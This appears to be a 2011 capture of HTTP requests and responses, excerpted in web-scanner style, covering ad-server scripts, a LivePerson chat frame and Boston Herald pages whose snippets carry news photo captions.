HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:32 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3177 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3177 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3174 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:14:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3183 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:48:53 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3440 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:37:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3440 Content-Type: application/x-javascript
GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/ HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:14:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3318 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/
GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/ HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:37:34 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3318 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:48:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3321 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:37:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3321 Content-Type: application/x-javascript
GET /hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386 HTTP/1.1 Host: base.liveperson.net Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; HumanClickCHATKEY=3761611791040242971; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:06:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924 Content-Type: text/html Last-Modified: Fri, 28 Jan 2011 14:06:44 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 43173
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN"> <head>
GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp HTTP/1.1 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Fri, 28 Jan 2011 05:20:30 GMT Set-Cookie: cid=4473401; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSSQCBSCQ=ILBLDIICKPOMNHFEBBFBBIPG; path=/ Cache-control: private Content-Length: 74164
GET /blogs/entertainment/the_assistant/?p=3065 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:39 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://bostonherald.com/blogs/entertainment/the_assistant/xmlrpc.php Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 39874
GET /blogs/lifestyle/fork_lift/?p=3679 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:37 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://bostonherald.com/blogs/lifestyle/fork_lift/xmlrpc.php Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 60730
<b> ...[SNIP]... is career here writing one of the nation's first newspaper beer columns. In his spare time, he pens thoughtful Buffalo wing-themed haiku and publishes the critically acclaimed <a href="http://ColdHardFootballFacts.com">ColdHardFootballFacts.com</a>. Kerry also writes for <a href="http://sportsillustrated.cnn.com/writers/kerry_byrne/archive/">SportsIllustrated.com</a> ...[SNIP]... </div>
<b> ...[SNIP]... </b> is Assistant Arts and Lifestyle Editor at the Boston Herald, where she writes the Sips column. An aspiring bon vivant, you can follow her work and play at <a href="http://twitter.com/Julia_Rappaport">twitter.com/ Julia_Rappaport</a> ...[SNIP]... <br>
GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:34 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 27939
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- // generic_TOP.tmpl // --> ...[SNIP]... <!-- Google hosts a compressed, cacheable version of Prototype --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script> <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>
GET /projects/your_tax_dollars.bg?src=Mefa HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:41 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 28342
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- // generic_TOP.tmpl // --> ...[SNIP]... <!-- Google hosts a compressed, cacheable version of Prototype --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script> <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>
GET /search/?topic=Annette+Bening&position=0 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:40 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 64237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- // generic_TOP.tmpl // --> ...[SNIP]... <!-- Google hosts a compressed, cacheable version of Prototype --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script> <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1309992&format=comments"> ...[SNIP]... <a id="trackMainImage_href" href="/track/inside_track/view.bg?articleid=1312550"> <img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/bcd2f7_jul_01282011.jpg" title="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." alt="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."> </a> ...[SNIP]... icleid=1312550" title="Moore’s the merrier at Hasty festivities" onclick="switchPhoto('198088'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198088" src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" title="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." alt="Nancy Lane" style="margin:0 2px" /> </a> ...[SNIP]... g?articleid=1312018" title="Hometown flicks garner several Oscar nods" onclick="switchPhoto('197841'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197841" src="http://multimedia.heraldinteractive.com/images/20110126/stp/14023c_ltp010711fighter001.jpg" title="Mark Wahlberg as Micky Ward and Christian Bale as Dick Eckland in a scene from the Lowell-based flick, ‘The Fighter,’ nominated for 7 Academy Awards, including best picture, and Bale for best supporting actor. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... 67" title="“King’s Speech’ treated royally by Oscar" onclick="switchPhoto('197722'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197722" src="http://multimedia.heraldinteractive.com/images/20110125/stp/a9de68_ctposcars.jpg" title="Oscar nominees include Christian Bale, seen with Mark Wahlberg, in ‘The Fighter,’ Jennifer Lawrence in ‘Winter’s Bone,’ Colin Firth in ‘The King’s Speech,’ and Natalie Portman in ‘Black Swan.&" alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... 67" title="“King’s Speech’ treated royally by Oscar" onclick="switchPhoto('197721'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197721" src="http://multimedia.heraldinteractive.com/images/20110125/stp/3f7f4c_ltpwbone.jpg" title="Jennifer Lawrence and the indie wonder “Winter’s Bone” made a surprise showing in the 83rd annual Academy Award nominations, announced today. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... =1311966" title="Oscar oversights include some Hollywood heavyweights" onclick="switchPhoto('197720'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197720" src="http://multimedia.heraldinteractive.com/images/20110125/stp/bb27d3_41de89_ltpdvd20101205.jpg" title="Leonardo DiCaprio in ‘Inception.’ " alt="" style="margin:0 2px" /> </a> ...[SNIP]... ticleid=1311847" title="List of 83rd annual Academy Award nominations" onclick="switchPhoto('197712'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197712" src="http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg" title="Christian Bale and Mark Wahlberg, right, appear in “The Fighter.” The Lowell-based flick was nominated for 7 Academy Awards, including best picture, and Bale for best supporting actor. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... itle="‘The King’s Speech’ gets 12 Oscar nominations" onclick="switchPhoto('197630'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197630" src="http://multimedia.heraldinteractive.com/images/20110125/stp/07f4a8_oscars012511.jpg" title="Actress Mo’Nique and The Academy of Motion Picture Arts and Sciences President Tom Sherak announce the Best Picture nominations for The 83rd Annual Academy Awards on Tuesday in Beverly Hills, Calif. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... cial Network,’ ‘King’s Speech’ aim for Oscars" onclick="switchPhoto('197622'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197622" src="http://multimedia.heraldinteractive.com/images/20110125/stp/5895cb_kings012611.jpg" title="In this file film publicity image released by The Weinstein Company, Colin Firth portrays King George VI in ‘The King’s Speech.’ " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... 045" title="’Social Network’ friends Globes with 4 prizes" onclick="switchPhoto('196442'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="196442" src="http://multimedia.heraldinteractive.com/images/20110116/stp/96c1eb_finch_01172011.jpg" title="In this publicity image released by NBC, David Fincher, accepts the award for Best Director in a Motion Picture for \"The Social Network\" during the Golden Globe Awards." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... "Christian Bale wins supporting-actor Globe for ’Fighter’" onclick="switchPhoto('196428'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="196428" src="http://multimedia.heraldinteractive.com/images/20110116/stp/d8e594_bale_01172011.jpg" title="Christian Bale holds up his trophy for Best Performance by an Actor in a Supporting Role in a Motion Picture for his role in \"The Fighter,\" during the Golden Globe Awards Sunday night." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... id=1309915" title="A king and a Web kingpin face off at Golden Globes" onclick="switchPhoto('196421'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="196421" src="http://multimedia.heraldinteractive.com/images/20110116/stp/63c6c4_ltpgold20110116.jpg" title="Ricky Gervais, left, arrives with his partner Jane Fallon for the Golden Globe Awards Sunday, Jan. 16, 2011, in Beverly Hills, Calif." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> ...[SNIP]... <h2><a href="http://www.carfind.com/">Carfind</a> ...[SNIP]... <h2><a href="http://www.homefind.com/">Homefind</a> ...[SNIP]... <h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a> ...[SNIP]... <h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a> ...[SNIP]... <span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a> ...[SNIP]... <div style="padding:15px; text-align:center;"> <a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a> <a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a> <a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a> ...[SNIP]... <br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a> ...[SNIP]... </script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> <noscript> <a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a> ...[SNIP]...
GET /search/?topic=Inside Track&type=byline&searchSite=Recent&x=10&y=10 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:40 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- // generic_TOP.tmpl // --> ...[SNIP]... <!-- Google hosts a compressed, cacheable version of Prototype --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script> <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/track/inside_track/view.bg?articleid=1312537&format=comments"> ...[SNIP]... <a id="trackMainImage_href" href="/entertainment/arts_culture/view.bg?articleid=1312707"> <img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/8df24f_Spidey_01292011.jpg" title="WEB OF WOES: The highly expensive Broadway musical ‘Spider-Man Turn: Off the Dark’ has been the victim of bad press, according to director Julie Taymor." alt="WEB OF WOES: The highly expensive Broadway musical ‘Spider-Man Turn: Off the Dark’ has been the victim of bad press, according to director Julie Taymor."> </a> ...[SNIP]... tle="$65-million ‘Spider-Man’ leaves Broadway hanging" onclick="switchPhoto('198237'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198237" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8df24f_Spidey_01292011.jpg" title="WEB OF WOES: The highly expensive Broadway musical ‘Spider-Man Turn: Off the Dark’ has been the victim of bad press, according to director Julie Taymor." alt="AP file" style="margin:0 2px" /> </a> ...[SNIP]... eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign" onclick="switchPhoto('198188'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198188" src="http://multimedia.heraldinteractive.com/images/20110128/stp/2784d0_ltpwatercannon.jpg" title="An Egyptian protester flashes Egypt’s flag as anti-riot policemen use water canon against protesters in Cairo, Egypt today. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign" onclick="switchPhoto('198230'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198230" src="http://multimedia.heraldinteractive.com/images/20110128/stp/097956_ltpEgyptC012811.jpg" title="An anti-government protester burns furniture outside of a looted building, near Tahrir Square, in Cairo, Egypt, Friday, Jan. 28, 2011." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign" onclick="switchPhoto('198229'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198229" src="http://multimedia.heraldinteractive.com/images/20110128/stp/fcc2bd_ltpEgyptB012811.jpg" title="An Egyptian anti-government activist kisses a riot police officer following clashes in Cairo, Egypt, Friday, Jan. 28, 2011." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign" onclick="switchPhoto('198228'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198228" src="http://multimedia.heraldinteractive.com/images/20110128/stp/3a7450_ltpProtestEgypt012811.jpg" title="An Egyptian Army armored personnel carrier is surrounded by anti-government protesters near Tahrir square in downtown Cairo, Egypt, Friday, Jan. 28, 2011." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign" onclick="switchPhoto('198195'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198195" src="http://multimedia.heraldinteractive.com/images/20110128/stp/7def3f_ltpprotesters.jpg" title="Egyptian anti-government activists run for a cover from the tear gas during clashes with the riot- police in Cairo, Egypt today. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... title="President Obama tells Mubarak: Must take ‘concrete steps" onclick="switchPhoto('198235'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198235" src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" title="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... ticleid=1312661" title="China celebrates, Li Na elated to be in final" onclick="switchPhoto('198219'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198219" src="http://multimedia.heraldinteractive.com/images/20110128/stp/d85cb2_ltpLiNa012811.jpg" title="China’s Li Na addresses reporters at a press conference at the Australian Open tennis championships in Melbourne, Australia, Friday, Jan. 28, 2011." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... ticleid=1312661" title="China celebrates, Li Na elated to be in final" onclick="switchPhoto('198220'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198220" src="http://multimedia.heraldinteractive.com/images/20110128/stp/e84f15_ltpDulko012811.jpg" title="Argentina’s Gisela Dulko, left, and Italy’s Flavia Pennetta, right, hold the trophy after beating Victoria Azarenka of Belarus and Russia’s Maria Kirilenko in their women’s doubles final at the Australian Open in Melbourne, Austral" alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... ticleid=1312661" title="China celebrates, Li Na elated to be in final" onclick="switchPhoto('198221'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198221" src="http://multimedia.heraldinteractive.com/images/20110128/stp/598de2_ltpFerrer012811.jpg" title="Spain’s David Ferrer hits a return to compatriot Rafael Nadal during their quarterfinal match at the Australian Open tennis championships in Melbourne, Australia, Wednesday, Jan. 26, 2011." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... cleid=1312652" title="Afghan police: 8 die in Kabul supermarket blast" onclick="switchPhoto('198203'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198203" src="http://multimedia.heraldinteractive.com/images/20110128/stp/eb36a1_ltpKabul012811.jpg" title="A man runs through a burning supermarket Friday, Jan. 28, 2011 in central Kabul, Afghanistan." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... cleid=1312609" title="Murray beats Ferrer, into Australian Open final" onclick="switchPhoto('198179'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198179" src="http://multimedia.heraldinteractive.com/images/20110128/stp/a4c7ad_amurray012811.jpg" title="Britain’s Andy Murray makes a backhand a return to Spain’s David Ferrer during the men’s semifinal at the Australian Open tennis championships in Melbourne, Australia, Friday." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... eid=1312587" title="Egyptian Nobel laureate ElBaradei in house arrest" onclick="switchPhoto('198170'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198170" src="http://multimedia.heraldinteractive.com/images/20110128/stp/418079_egypt012811.jpg" title="Former Director General of the International Atomic Energy Agency, IAEA, and Nobel Peace Prize winner Mohamed ElBaradei talks to members of the media as he arrives at Cairo’s airport in Egypt, from Austria, Thursday." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... le="Tracked Down: Deion Branch, Jarvis Green, Kevin Faulk and more..." onclick="switchPhoto('198089'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198089" src="http://multimedia.heraldinteractive.com/images/20110127/stp/5e8b2b_ben_01282011.jpg" title="Former Patriots defensive end Jarvis Green celebrates his birthday with a cake replica of Gillette Stadium." alt="Micaila’s Creations" style="margin:0 2px" /> </a> ...[SNIP]... e="We Hear: Mitt Romney, David Letterman, Andrew Weisblum and more..." onclick="switchPhoto('198099'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198099" src="http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg" title="Mitt Romney." alt="Angela Rowlings" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312552" title="Another winter wallop batters Boston" onclick="switchPhoto('198098'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198098" src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" title="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." alt="Mark Garfinkel" style="margin:0 2px" /> </a> ...[SNIP]... icleid=1312550" title="Moore’s the merrier at Hasty festivities" onclick="switchPhoto('198088'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> 